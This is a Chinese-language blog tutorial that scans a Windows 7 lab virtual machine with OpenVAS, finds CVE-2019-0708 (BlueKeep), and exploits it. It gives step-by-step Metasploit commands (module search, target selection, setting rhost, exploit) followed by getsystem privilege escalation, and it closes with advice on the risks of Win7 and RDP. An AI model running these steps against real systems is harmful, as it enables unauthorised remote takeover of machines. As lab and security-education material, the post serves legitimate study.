聲明:禁止用作非法目的,謝絕一切形式的轉載。
在這里對OpenVas進行了簡單的介紹。這篇文章著重介紹通過OpenVas掃描出來漏洞之后,如何利用這些漏洞達到獲取被入侵機器"肉雞"的shell(也就是控制權)。
OpenVas
GSM協議

NTP – Time synchronization • Connecting to 123/udp • Mandatory • Not encrypted • May use internal NTP server Feeds (see below) • Direct
- Connecting to 24/tcp or 443/tcp
- Direct internet access required
• Via proxy
- Connecting to internal HTTP proxy supporting CONNECT method on configurable port
• Connecting to apt.greenbone.net and feed.greenbone.net • Mandatory on stand-alone and master Appliances • Used protocol is SSH • Encrypted and bidirectionally authenticated via SSH
- Server: public key
- Client: public key


術語
Alert: An alert is an action which can be triggered by certain events. In most cases, this means the output of a notification, e.g., an e-mail in case of new found vulnerabilities.
CVE: Common Vulnerabilities and Exposures (CVE) is a dictionary of publicly known information security vulnerabilities and exposures.
QoD: The Quality of Detection (QoD) is a value between 0 % and 100 % describing the reliability of the executed vulnerability detection or product detection.
OpenVas掃描
通過"Configuration"設置掃描目標(本文使用Vmware虛擬機 Win7 64 SP1操作系統), 通過"Scan" 設置掃描任務。掃描結果如下:

查看Nginx條目(Vmware虛擬機 Win7 64 SP1操作系統)報告信息:

從掃描結果中可以看出存在CVE-2019-0708漏洞,這是一個由微軟的RDP服務引起的任意代碼執行漏洞,漏洞的詳細信息如下。

漏洞利用
- 開啟msf
msfconsole
- 搜索模塊
search cve-2019-0708
- 選擇攻擊模塊
use 1

- 選擇攻擊目標
show targets
set target 2

- 設置遠程目標ip
set rhost 192.168.42.148

- 執行
exploit

通過getsystem提權獲得最高權限system,然后就真的可以為所欲為了。
寫在最后
Win7系統的漏洞還是很多的,目前微軟已經停止了對Win7系統的維護,使用Win7系統要謹慎。當然這并不能說明win10系統就安全了,漏洞也是多的可怕。
對于遠程桌面,謹慎開啟。3389這個端口,無論在微軟的那個系統中,都是漏洞泛濫之地。
公眾號
更多內容,歡迎關注我的微信公眾號:無情劍客。
